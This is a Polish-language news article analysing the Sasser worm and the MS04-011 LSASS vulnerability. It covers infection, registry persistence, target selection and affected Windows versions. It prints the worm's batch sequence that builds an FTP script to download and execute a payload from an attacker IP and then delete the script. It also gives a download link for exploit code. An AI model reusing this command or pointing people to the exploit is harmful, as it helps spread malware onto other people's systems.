Nowy robak Sasser – atakuje
W dniu 30 kwietnia pojawił się nowy robak internetowy Sasser infekujący poprzez lukę MS04-011. Jak się okazuje każdy może wykorzystać ją indywidualnie. Luka uważana jest za krytyczną i zezwala na zdalne wykonanie dowolnego kodu. Atak przejawia się błędem modułu lsass.exe co może wywołać znane z robaka MSBlast procedury restartujące z tą różnicą, że infekcja nie musi się udać aby takową procedurę wywołać (restart anuluje się poleceniem shutdown -a).
Infekcja robaka Sasser polega na przepełnieniu bufora. Sam intruz napisany jest w Microsoft Visual C. Jego główną procedurą jest reprodukcja. Zaraz po infekcji kopiuje się do katalogu \WINDOWS lub \WINNT oraz instaluje w rejestrze:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
wartość o nazwie „avserve.exe” lub „avserve2.exe” w przypadku Sasser B. Robak potrafi zmodyfikować w systemie panel wyłączający maszynę co oznacza, że start/wyłącz komputer jest równoważne z opcją start/wyloguj. Ciekawe, że gdy infekcja wykryje w systemie inny rodzaj robaka „Jobaka3l” natychmiast go usunie. Następnie otworzy usługę FTP na porcie 5554, oraz wejdzie w niekończącą się pętle reprodukcyjną. Istnieje 52%, że następny atakowany adres będzie przypadkowy. 25% szans, że pierwsze dwa oktety będą identyczne z zainfekowanym adresem., oraz 23% że tylko pierwszy oktet będzie odziedziczony. Następnie gdy nawiąże połączenie z zdalnym hostem na porcie 445 generuje pakiety które pozwolą mu ustalić z jaką wersją systemu Windows ma do czynienia. Następnie wysyła exploit LSA i próbuje nawiązać połączenie na porcie TCP 9996. Gdy wszystko się powiedzie użyje powłoki do skopiowania oraz aktywowania pliku exe na atakowanym hoście.
Syntaktyka komend prezentuje się następująco:
echo off
echo open [IP atakującego] 5554>>cmd.ftp
echo anonymous>>cmd.ftp
echo user
echo bin>>cmd.ftp
echo get [przypadkowa ofiara]_up.exe>>cmd.ftp
echo bye>>cmd.ftp
echo on
ftp -s:cmd.ftp
[przypadkowa ofiara]_up.exe
echo off
del cmd.ftp
echo on
Podatne są systemy Windows XP/2000. Wykorzystanie luki na systemie Windows Serwer 2003 możliwe jest jedynie lokalnie. NT 4.0 nie jest podatny. Więcej informacji znajduję się na: microsoft.com/poland/technet/security/bulletin/MS04-011.aspx
Dostępne jest już podstawowe narzędzie służące do wykrywania podatnych systemów. Podobnie jak w przypadku luki ms03-026 skaner pojedynczych skaz systemowych dostępny jest na: eeye.com/html/Research/Tools/Download.asp?file=RetinaSasser
Z kolei kod exploita znajduje się na przykład na:
k-otik.com/exploits/04252004.ms04011lsass.rar
Zobacz również:
– Jak skutecznie wykorzystać luki w usłudze Remote Procedure Call?